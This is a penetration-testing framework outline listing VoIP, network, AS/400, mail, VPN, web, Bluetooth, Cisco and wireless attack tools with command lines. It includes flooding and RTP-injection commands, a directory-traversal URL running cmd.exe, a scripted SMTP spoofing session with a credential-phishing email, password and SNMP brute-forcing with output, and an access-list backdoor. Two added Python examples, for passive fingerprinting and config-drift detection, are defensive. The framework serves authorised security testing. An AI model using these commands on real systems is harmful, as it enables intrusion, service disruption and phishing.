Penetration Testing Framework 0.58

1. VoIP Security

1.1. Sniffing Tools

1.1.1. AuthTool

1.1.2. Cain & Abel

1.1.3. Etherpeek

1.1.4. NetDude

1.1.5. Oreka

1.1.6. PSIPDump

1.1.7. SIPomatic

1.1.8. SIPv6 Analyzer

1.1.9. UCSniff

1.1.10. VoiPong

1.1.11. VOMIT

1.1.12. Wireshark

1.1.13. WIST - Web Interface for SIP Trace

1.2. Scanning and Enumeration Tools

1.2.1. enumIAX

1.2.2. fping

1.2.3. IAX Enumerator

1.2.4. iWar

1.2.5. Nessus

1.2.6. Nmap

1.2.7. SIP Forum Test Framework (SFTF)

1.2.8. SIPcrack

1.2.9. sipflanker

1.2.9.1. python sipflanker.py 192.168.1-254

1.2.10. SIP-Scan

1.2.11. SIP.Tastic

1.2.12. SIPVicious

1.2.13. SiVuS

1.2.14. SMAP

1.2.14.1. smap IP_Address/Subnet_Mask

1.2.14.2. smap -o IP_Address/Subnet_Mask

1.2.14.3. smap -l IP_Address

1.2.15. snmpwalk

1.2.16. VLANping

1.2.17. VoIPAudit

1.2.18. VoIP GHDB Entries

1.2.19. VoIP Voicemail Database

1.3. Packet Creation and Flooding Tools

1.3.1. H.323 Injection Files

1.3.2. H225regreject

1.3.3. IAXHangup

1.3.4. IAXAuthJack

1.3.5. IAX.Brute

1.3.6. IAXFlooder

1.3.6.1. ./iaxflood sourcename destinationname numpackets

1.3.7. INVITE Flooder

1.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

1.3.8. kphone-ddos

1.3.9. RTP Flooder

1.3.10. rtpbreak

1.3.11. Scapy

1.3.12. Seagull

1.3.13. SIPBomber

1.3.14. SIPNess

1.3.15. SIPp

1.3.16. SIPsak

1.3.16.1. Tracing paths: sipsak -T -s sip:username@domain

1.3.16.2. OPTIONS request: sipsak -vv -s sip:username@domain

1.3.16.3. Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain

1.3.17. SIP-Send-Fun

1.3.18. SIPVicious

1.3.19. Spitter

1.3.20. TFTP Brute Force

1.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

1.3.21. UDP Flooder

1.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

1.3.22. UDP Flooder (with VLAN Support)

1.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

1.3.23. Voiphopper

1.4. Fuzzing Tools

1.4.1. Asteroid

1.4.2. Codenomicon VoIP Fuzzers

1.4.3. Fuzzy Packet

1.4.4. Mu Security VoIP Fuzzing Platform

1.4.5. ohrwurm RTP Fuzzer

1.4.6. PROTOS H.323 Fuzzer

1.4.7. PROTOS SIP Fuzzer

1.4.8. SIP Forum Test Framework (SFTF)

1.4.9. Sip-Proxy

1.4.10. Spirent ThreatEx

1.5. Signaling Manipulation Tools

1.5.1. AuthTool

1.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

1.5.2. BYE Teardown

1.5.3. Check Sync Phone Rebooter

1.5.4. RedirectPoison

1.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

1.5.5. Registration Adder

1.5.6. Registration Eraser

1.5.7. Registration Hijacker

1.5.8. SIP-Kill

1.5.9. SIP-Proxy-Kill

1.5.10. SIP-RedirectRTP

1.5.11. SipRogue

1.5.12. vnak

1.6. Media Manipulation Tools

1.6.1. RTP InsertSound

1.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

1.6.2. RTP MixSound

1.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

1.6.3. RTPProxy

1.6.4. RTPInject

1.7. Generic Software Suites

1.7.1. OAT Office Communication Server Tool Assessment

1.7.2. EnableSecurity VOIPPACK

1.7.2.1. Note: - Add-on for Immunity Canvas

1.8. References

1.8.1. URL's

1.8.1.1. Common Vulnerabilities and Exploits (CVE)

1.8.1.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

1.8.1.2. Default Passwords

1.8.1.3. Hacking Exposed VoIP

1.8.1.3.1. Tool Pre-requisites

1.8.1.4. VoIPsa

1.8.2. White Papers

1.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

1.8.2.2. An Analysis of VoIP Security Threats and Tools

1.8.2.3. Hacking VoIP Exposed

1.8.2.4. Security testing of SIP implementations

1.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

1.8.2.6. Two attacks against VoIP

1.8.2.7. VoIP Attacks!

1.8.2.8. VoIP Security Audit Program (VSAP)

2. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS fingerprinting, and identifying the remote applications being served. OS fingerprinting (TCP/IP stack fingerprinting) is the process of determining the operating system in use on a remote host. This is carried out by analysing packets received from the host in question. There are two distinct ways to OS fingerprint: actively (e.g. nmap) or passively (e.g. scanrand). Passive OS fingerprinting determines the remote OS using only the packets received and does not require any packets to be sent. Active OS fingerprinting is very noisy: it requires packets to be sent to the remote host and then waits for a reply (or the lack of one). Different operating systems respond differently to certain types of packet (the response is governed by the relevant RFC plus any proprietary behaviour the vendor, notably Microsoft, has enabled within the system), so custom-crafted packets may be sent. The remote applications served on a host can be determined from the open ports on that host. By port scanning it is then possible to build up a picture of which applications are running and to tailor the test accordingly.
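To make the active/passive distinction concrete, the following is an added example (not part of the framework or any of the tools it lists) of the passive approach: nothing is sent, and a single observed TCP SYN is classified from the fields the sending stack chose (initial TTL, DF bit, TCP option order). The two sample packets, the signature table and the names "Linux-like"/"Windows-like" are constructed for the demo; production passive tools use far richer signatures.

```python
"""Passive TCP/IP stack fingerprinting from one observed SYN (added example).
The packets and signature table are constructed for the demo, not captured."""
import struct
from dataclasses import dataclass

OPTION_NAMES = {2: "MSS", 3: "WS", 4: "SACK", 8: "TS"}

# Constructed signature table: (initial TTL, DF bit set, TCP option order).
SIGNATURES = {
    "Linux-like": (64, True, ("MSS", "SACK", "TS", "NOP", "WS")),
    "Windows-like": (128, True, ("MSS", "NOP", "WS", "NOP", "NOP", "SACK")),
}


@dataclass(frozen=True)
class SynFeatures:
    ttl: int
    initial_ttl: int
    df: bool
    window: int
    options: tuple


def parse_syn(pkt: bytes) -> SynFeatures:
    """Pull the stack-revealing fields out of a raw IPv4 + TCP SYN."""
    ihl = (pkt[0] & 0x0F) * 4
    flags_frag, ttl, proto = struct.unpack("!HBB", pkt[6:10])
    if proto != 6:
        raise ValueError("not TCP")
    tcp = pkt[ihl:]
    data_off = (tcp[12] >> 4) * 4
    tcp_flags = tcp[13]
    if not (tcp_flags & 0x02) or (tcp_flags & 0x10):
        raise ValueError("not a bare SYN")
    window = struct.unpack("!H", tcp[14:16])[0]
    opts, names, i = tcp[20:data_off], [], 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:          # end of option list
            break
        if kind == 1:          # NOP carries no length byte
            names.append("NOP")
            i += 1
            continue
        names.append(OPTION_NAMES.get(kind, f"K{kind}"))
        i += opts[i + 1]       # skip kind, length and value
    # Observed TTL is the initial TTL minus hops; round up to the common initial values.
    initial_ttl = next(t for t in (32, 64, 128, 255) if ttl <= t)
    return SynFeatures(ttl, initial_ttl, bool(flags_frag & 0x4000), window, tuple(names))


def passive_fingerprint(pkt: bytes):
    """Return (candidate OS families, estimated hop count) for one SYN."""
    f = parse_syn(pkt)
    guesses = [name for name, sig in SIGNATURES.items()
               if sig == (f.initial_ttl, f.df, f.options)]
    return guesses, f.initial_ttl - f.ttl


def build_syn(ttl: int, df: bool, window: int, options: bytes) -> bytes:
    """Construct a minimal IPv4 + TCP SYN for the demo (checksums left zero)."""
    options += b"\x00" * (-len(options) % 4)
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 0,
                      ((20 + len(options)) // 4) << 4, 0x02, window, 0, 0) + options
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234,
                     0x4000 if df else 0, ttl, 6, 0,
                     bytes([192, 0, 2, 10]), bytes([192, 0, 2, 20]))
    return ip + tcp


# Constructed samples: MSS,SACK,TS,NOP,WS and MSS,NOP,WS,NOP,NOP,SACK option layouts.
LINUX_OPTS = bytes([2, 4, 5, 0xB4, 4, 2, 8, 10]) + b"\x00" * 8 + bytes([1, 3, 3, 7])
WINDOWS_OPTS = bytes([2, 4, 5, 0xB4, 1, 3, 3, 8, 1, 1, 4, 2])
SAMPLE_LINUX_SYN = build_syn(52, True, 29200, LINUX_OPTS)
SAMPLE_WINDOWS_SYN = build_syn(117, True, 64240, WINDOWS_OPTS)

if __name__ == "__main__":
    for name, pkt in (("sample A", SAMPLE_LINUX_SYN), ("sample B", SAMPLE_WINDOWS_SYN)):
        print(name, passive_fingerprint(pkt))
```

Because the classifier only consumes packets the remote host already sent (to a honeypot, a sniffer port or a pcap), it generates none of the traffic that makes active fingerprinting noisy; the trade-off is that it can only ever describe hosts that happen to talk.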

2.1. Default Port Lists

2.1.1. Windows

2.1.2. *nix

2.2. Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.

2.2.1. General Enumeration Tools

2.2.1.1. nmap

2.2.1.1.1. nmap -n -A -PN -p- -T aggressive -iL nmap.targetlist -oX nmap.syn.results.xml

2.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results

2.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results

2.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason

2.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list

2.2.1.2. netcat

2.2.1.2.1. nc -v -n IP_Address port

2.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number

2.2.1.3. amap

2.2.1.3.1. amap -bqv 192.168.1.1 80

2.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]

2.2.1.4. xprobe2

2.2.1.4.1. xprobe2 192.168.1.1

2.2.1.5. sinfp

2.2.1.5.1. ./sinfp.pl -i -p

2.2.1.6. nbtscan

2.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)

2.2.1.7. hping

2.2.1.7.1. hping ip_address

2.2.1.8. scanrand

2.2.1.8.1. scanrand ip_address:all

2.2.1.9. unicornscan

2.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E

2.2.1.10. netenum

2.2.1.10.1. netenum network/netmask timeout

2.2.1.11. fping

2.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)

2.2.2. Firewall Specific Tools

2.2.2.1. firewalk

2.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]

2.2.2.2. ftester

2.2.2.2.1. On host 1: ./ftestd -i eth0 -v ; on host 2: ./ftest -f ftest.conf -v -d 0.01 ; then: ./freport ftest.log ftestd.log

2.2.3. Default Passwords (Examine list)

2.2.3.1. Passwords A

2.2.3.2. Passwords B

2.2.3.3. Passwords C

2.2.3.4. Passwords D

2.2.3.5. Passwords E

2.2.3.6. Passwords F

2.2.3.7. Passwords G

2.2.3.8. Passwords H

2.2.3.9. Passwords I

2.2.3.10. Passwords J

2.2.3.11. Passwords K

2.2.3.12. Passwords L

2.2.3.13. Passwords M

2.2.3.14. Passwords N

2.2.3.15. Passwords O

2.2.3.16. Passwords P

2.2.3.17. Passwords R

2.2.3.18. Passwords S

2.2.3.19. Passwords T

2.2.3.20. Passwords U

2.2.3.21. Passwords V

2.2.3.22. Passwords W

2.2.3.23. Passwords X

2.2.3.24. Passwords Y

2.2.3.25. Passwords Z

2.2.3.26. Passwords (Numeric)

2.3. Active Hosts

2.3.1. Open TCP Ports

2.3.2. Closed TCP Ports

2.3.3. Open UDP Ports

2.3.4. Closed UDP Ports

2.3.5. Service Probing

2.3.5.1. SMTP Mail Bouncing

2.3.5.2. Banner Grabbing

2.3.5.2.1. Other

2.3.5.2.2. HTTP

2.3.5.2.3. HTTPS

2.3.5.2.4. SMTP

2.3.5.2.5. POP3

2.3.5.2.6. FTP

2.3.6. ICMP Responses

2.3.6.1. Type 3 (Port Unreachable)

2.3.6.2. Type 8 (Echo Request)

2.3.6.3. Type 13 (Timestamp Request)

2.3.6.4. Type 15 (Information Request)

2.3.6.5. Type 17 (Subnet Address Mask Request)

2.3.6.6. Responses from broadcast address

2.3.7. Source Port Scans

2.3.7.1. TCP/UDP 53 (DNS)

2.3.7.2. TCP 20 (FTP Data)

2.3.7.3. TCP 80 (HTTP)

2.3.7.4. TCP/UDP 88 (Kerberos)

2.3.8. Firewall Assessment

2.3.8.1. Firewalk

2.3.8.2. TCP/UDP/ICMP responses

2.3.9. OS Fingerprint

3. AS/400 Auditing

3.1. Remote

3.1.1. Information Gathering

3.1.1.1. Nmap using common iSeries (AS/400) services.

3.1.1.1.1. Unsecured services (Port;name;description)

3.1.1.1.2. Secured services (Port;name;description)

3.1.1.2. NetCat (old school technique)

3.1.1.2.1. for p in $(cut -d';' -f1 ListOfServices.txt); do nc -v -z -w 2 target "$p"; done 2>&1 | grep "open"

3.1.1.3. Banners Grabbing

3.1.1.3.1. Telnet

3.1.1.3.2. FTP

3.1.1.3.3. HTTP Banner

3.1.1.3.4. POP3

3.1.1.3.5. SNMP

3.1.1.3.6. SMTP

3.1.2. Users Enumeration

3.1.2.1. Default AS/400 users accounts

3.1.2.2. Error messages

3.1.2.2.1. Telnet Login errors

3.1.2.2.2. POP3 authentication Errors

3.1.2.3. Qsys symbolic link (if ftp is enabled)

3.1.2.3.1. ftp target, then at the ftp> prompt: quote stat ; quote site namefmt 1

3.1.2.3.2. cd /

3.1.2.3.3. quote site listfmt 1

3.1.2.3.4. mkdir temp

3.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

3.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

3.1.2.3.7. dir /temp/qsys/*.usrprf

3.1.2.4. LDAP

3.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

3.1.2.4.2. Tool to browse LDAP

3.1.3. Exploitation

3.1.3.1. CVE References

3.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

3.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

3.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

3.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

3.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

3.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

3.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

3.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

3.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

3.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

3.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

3.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

3.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

3.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

3.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

3.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

3.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

3.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

3.1.3.2. Access with Work Station Gateway

3.1.3.2.1. http://target:5061/WSG

3.1.3.2.2. Default AS/400 accounts.

3.1.3.3. Network attacks (next release)

3.1.3.3.1. DB2

3.1.3.3.2. QSHELL

3.1.3.3.3. Hijacking Terminals

3.1.3.3.4. Trojan attacks

3.1.3.3.5. Hacking from AS/400

3.2. Local

3.2.1. System Value Security

3.2.1.4. Untitled

3.2.1.4.1. Recommended value is 30

3.2.2. Password Policy

3.2.3. Audit level

3.2.3.1. Untitled

3.2.3.1.1. Recommended value is *SECURITY

3.2.4. Documentation

3.2.4.1. Users class

3.2.4.2. System Audit Settings

3.2.4.3. Special Authorities Definitions

4. Server Specific Tests

4.1. Databases

4.1.1. Direct Access Interrogation

4.1.1.1. MS SQL Server

4.1.1.1.1. Ports

4.1.1.1.2. Version

4.1.1.1.3. osql

4.1.1.2. Oracle

4.1.1.2.1. Ports

4.1.1.2.2. TNS Listener

4.1.1.2.3. SQL Plus

4.1.1.2.4. Default Account/Passwords

4.1.1.2.5. Default SID's

4.1.1.3. MySQL

4.1.1.3.1. Ports

4.1.1.3.2. Version

4.1.1.3.3. Users/Passwords

4.1.1.4. DB2

4.1.1.5. Informix

4.1.1.6. Sybase

4.1.1.7. Other

4.1.2. Scans

4.1.2.1. Default Ports

4.1.2.2. Non-Default Ports

4.1.2.3. Instance Names

4.1.2.4. Versions

4.1.3. Password Attacks

4.1.3.1. Sniffed Passwords

4.1.3.1.1. Cracked Passwords

4.1.3.1.2. Hashes

4.1.3.2. Direct Access Guesses

4.1.4. Vulnerability Assessment

4.1.4.1. Automated

4.1.4.1.1. Reports

4.1.4.1.2. Vulnerabilities

4.1.4.2. Manual

4.1.4.2.1. Patch Levels

4.1.4.2.2. Confirmed Vulnerabilities

4.2. Mail

4.2.1. Scans

4.2.2. Fingerprint

4.2.2.1. Manual

4.2.2.2. Automated

4.2.3. Spoofable

4.2.3.1. Telnet spoof

4.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected].

4.2.4. Relays

4.3. VPN

4.3.1. Scanning

4.3.1.1. 500 UDP IPSEC

4.3.1.2. 1723 TCP PPTP

4.3.1.3. 443 TCP/SSL

4.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

4.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

4.3.2. Fingerprinting

4.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

4.3.3. PSK Crack

4.3.3.1. ikeprobe 80.75.68.27

4.3.3.2. sniff for responses with C&A or ikecrack

4.4. Web

4.4.1. Vulnerability Assessment

4.4.1.1. Automated

4.4.1.1.1. Reports

4.4.1.1.2. Vulnerabilities

4.4.1.2. Manual

4.4.1.2.1. Patch Levels

4.4.1.2.2. Confirmed Vulnerabilities

4.4.2. Permissions

4.4.2.1. PUT /test.txt HTTP/1.0

4.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

4.4.2.3. POST http://mail.another.com:25/ HTTP/1.0
           Content-Type: text/plain
           Content-Length: 6

4.4.3. Scans

4.4.4. Fingerprinting

4.4.4.1. Other

4.4.4.2. HTTP

4.4.4.2.1. Commands

4.4.4.2.2. Modules

4.4.4.2.3. File Extensions

4.4.4.3. HTTPS

4.4.4.3.1. Commands

4.4.4.3.2. Commands

4.4.4.3.3. File Extensions

4.4.5. Directory Traversal

4.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

5. Bluetooth Specific Testing

5.1. Bluescanner

5.2. Bluesweep

5.3. btscanner

5.4. Redfang

5.5. Blueprint

5.6. Bluesnarfer

5.7. Bluebugger

5.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

5.8. Blueserial

5.9. Bloover

5.10. Bluesniff

5.11. Exploit Frameworks

5.11.1. BlueMaho

5.12. Resources

5.12.1. URL's

5.12.1.1. BlueStumbler.org

5.12.1.2. Bluejackq.com

5.12.1.3. Bluejacking.com

5.12.1.4. Bluejackers

5.12.1.5. bluetooth-pentest

5.12.1.6. ibluejackedyou.com

5.12.1.7. Trifinite

5.12.2. Vulnerability Information

5.12.2.1. Common Vulnerabilities and Exploits (CVE)

5.12.2.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

5.12.3. White Papers

5.12.3.1. Bluesnarfing

6. Cisco Specific Testing

6.1. Methodology

6.1.1. Scan & Fingerprint.

6.1.1.3. If SNMP is active, then community string guessing should be performed.

6.1.2. Credentials Guessing.

6.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

6.1.3. Connect

6.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

6.1.4. Check for bugs

6.1.4.1. Untitled

6.1.4.1.1. The most widely known/used are: Nessus, Retina, GFI LanGuard and Core Impact.

6.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

6.1.5. Further your attack

6.1.5.1. Untitled

6.1.5.1.1. running-config is the currently running configuration. It is loaded from the startup-config on boot. This configuration is editable and changes take effect immediately, but any changes are lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network.

6.1.5.1.2. startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.

6.1.5.2. Untitled

6.1.5.2.1. #> access-list 100 permit ip <IP> any
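The running-config/startup-config split described above is also what a defender checks: an entry that exists only in running-config has been applied without being saved, which is exactly what a hand-added access-list or a widened vty transport looks like. The following is an added example (not framework tooling, and not Cisco's) that normalises the two configs, reports the lines present in only one of them, and flags the additions a reviewer would want to look at first. The two sample configs, the hostname and the RFC 5737 addresses are constructed for the demo.

```python
"""Detect unsaved running-config changes on a Cisco IOS device (added example).
Both configs below are constructed; compare the real outputs of
'show running-config' and 'show startup-config' in the same way."""
from __future__ import annotations
import re

STARTUP_CONFIG = """\
! Last configuration change at 10:00:00 UTC Mon Jan 1 2024
version 12.2
hostname edge-router
!
interface FastEthernet0/0
 ip address 192.0.2.1 255.255.255.0
 ip access-group 100 in
!
access-list 100 permit tcp any host 192.0.2.10 eq 443
access-list 100 deny ip any any
!
line vty 0 4
 transport input ssh
!
end
"""

RUNNING_CONFIG = """\
! Last configuration change at 13:37:00 UTC Mon Jan 1 2024
version 12.2
hostname edge-router
!
interface FastEthernet0/0
 ip address 192.0.2.1 255.255.255.0
 ip access-group 100 in
!
access-list 100 permit ip 203.0.113.5 any
access-list 100 permit tcp any host 192.0.2.10 eq 443
access-list 100 deny ip any any
!
line vty 0 4
 transport input ssh telnet
!
end
"""

# Comment lines that legitimately differ between the two views.
VOLATILE = re.compile(r"^! (Last configuration change|NVRAM config last updated)")

# Heuristics for additions worth an immediate look (constructed for the demo).
SUSPICIOUS = [
    re.compile(r"^access-list \d+ permit ip \S+ any$"),   # host-to-anywhere permit
    re.compile(r"^\s*transport input .*telnet"),          # cleartext management enabled
]


def normalise(config: str) -> list[str]:
    """Drop blank lines, bare '!' separators and timestamp comments.
    Leading indentation is kept so sub-commands stay distinct from global ones."""
    out = []
    for raw in config.splitlines():
        line = raw.rstrip()
        if not line.strip() or line.strip() == "!" or VOLATILE.match(line):
            continue
        out.append(line)
    return out


def config_drift(startup: str, running: str) -> dict[str, list[str]]:
    """Lines only in running (unsaved additions) and only in startup (unsaved removals)."""
    s_lines, r_lines = normalise(startup), normalise(running)
    s_set, r_set = set(s_lines), set(r_lines)
    return {
        "added": [l for l in r_lines if l not in s_set],
        "removed": [l for l in s_lines if l not in r_set],
    }


def suspicious_additions(drift: dict[str, list[str]]) -> list[str]:
    """Subset of the unsaved additions that match the review heuristics."""
    return [l for l in drift["added"] if any(p.search(l) for p in SUSPICIOUS)]


if __name__ == "__main__":
    drift = config_drift(STARTUP_CONFIG, RUNNING_CONFIG)
    for line in drift["added"]:
        print("+", line)
    for line in drift["removed"]:
        print("-", line)
    print("review first:", suspicious_additions(drift))
```

Run periodically (or on every "show running-config" pulled by the config-management tool) this catches exactly the temporary change the passage describes; a change that has been written to startup-config instead needs a comparison against the last known-good backup, not against the other on-box copy.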

6.2. Scan & Fingerprint.

6.2.1. Port Scanning

6.2.1.1. nmap

6.2.1.2. Other tools

6.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

6.2.2. Fingerprinting

6.2.2.1. Untitled

6.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

6.2.2.2. Untitled

6.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

6.3. Password Guessing.

6.3.1. Untitled

6.3.1.1. ./CAT  -h  <IP>  -a  password.wordlist

6.3.2. Untitled

6.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

6.3.3. Untitled

6.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco

6.4. SNMP Attacks.

6.4.1. Untitled

6.4.1.1. ./CAT  -h  <IP>  -w  SNMP.wordlist

6.4.2. Untitled

6.4.2.1. onesixtyone -c SNMP.wordlist <IP>

6.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175
Scanning 1 hosts, 64 communities
10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug

6.4.3. Untitled

6.4.3.1. snmpwalk -v <Version> -c <Community string> <IP>

6.5. Connecting.

6.5.1. Telnet

6.5.1.1. Untitled

6.5.1.1.1.  telnet  <IP>

6.5.1.1.2. Sample Banners

6.5.2. SSH

6.5.3. Web Browser

6.5.3.1. Untitled

6.5.3.1.1. This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

6.5.3.1.2. Authentication Required - Enter username and password for "level_15_access" at http://10.1.1.1 - User Name: / Password:

6.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

6.5.4. TFTP

6.5.4.1. Untitled

6.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

6.5.4.2. Untitled

6.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

6.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

6.5.4.2.3. Creating backdoors in Cisco IOS using TCL

6.6. Known Bugs.

6.6.1. Attack Tools

6.6.1.2. Untitled

6.6.1.2.1. Web browse to the Cisco device: http://<IP>

6.6.1.3. Untitled

6.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

6.6.2. Common Vulnerabilities and Exploits (CVE) Information

6.6.2.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

6.7. Configuration Files.

6.7.1. Untitled

6.7.1.1. Configuration files explained

6.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password, which is superseded by the enable secret password for remote access.

6.7.1.1.4. Password Encryption Utilised

6.7.1.2. Configuration Testing Tools

6.7.1.2.1. Nipper

6.7.1.2.2. fwauto (Beta)

6.8. References.

6.8.1. Cisco IOS Exploitation Techniques

7. Wireless Penetration

7.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester (and hence the customer) a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.

7.1.1. Site Map

7.1.1.1. RF Map

7.1.1.1.1. Lines of Sight

7.1.1.1.2. Signal Coverage

7.1.1.2. Physical Map

7.1.1.2.1. Triangulate APs

7.1.1.2.2. Satellite Imagery

7.1.2. Network Map

7.1.2.1. MAC Filter

7.1.2.1.1. Authorised MAC Addresses

7.1.2.1.2. Reaction to Spoofed MAC Addresses

7.1.2.2. Encryption Keys utilised

7.1.2.2.1. WEP

7.1.2.2.2. WPA/PSK

7.1.2.2.3. 802.1x

7.1.2.3. Access Points

7.1.2.3.1. ESSID

7.1.2.3.2. BSSIDs

7.1.2.4. Wireless Clients

7.1.2.4.1. MAC Addresses

7.1.2.4.2. Intercepted Traffic

7.2. Wireless Toolkit

7.2.1. Wireless Discovery

7.2.1.1. Aerosol

7.2.1.2. Airfart

7.2.1.3. Aphopper

7.2.1.4. Apradar

7.2.1.5. BAFFLE

7.2.1.6. inSSIDer

7.2.1.7. iWEPPro

7.2.1.8. karma

7.2.1.9. KisMAC-ng

7.2.1.10. Kismet

7.2.1.11. MiniStumbler

7.2.1.12. Netstumbler

7.2.1.13. Vistumbler

7.2.1.14. Wellenreiter

7.2.1.15. Wifi Hopper

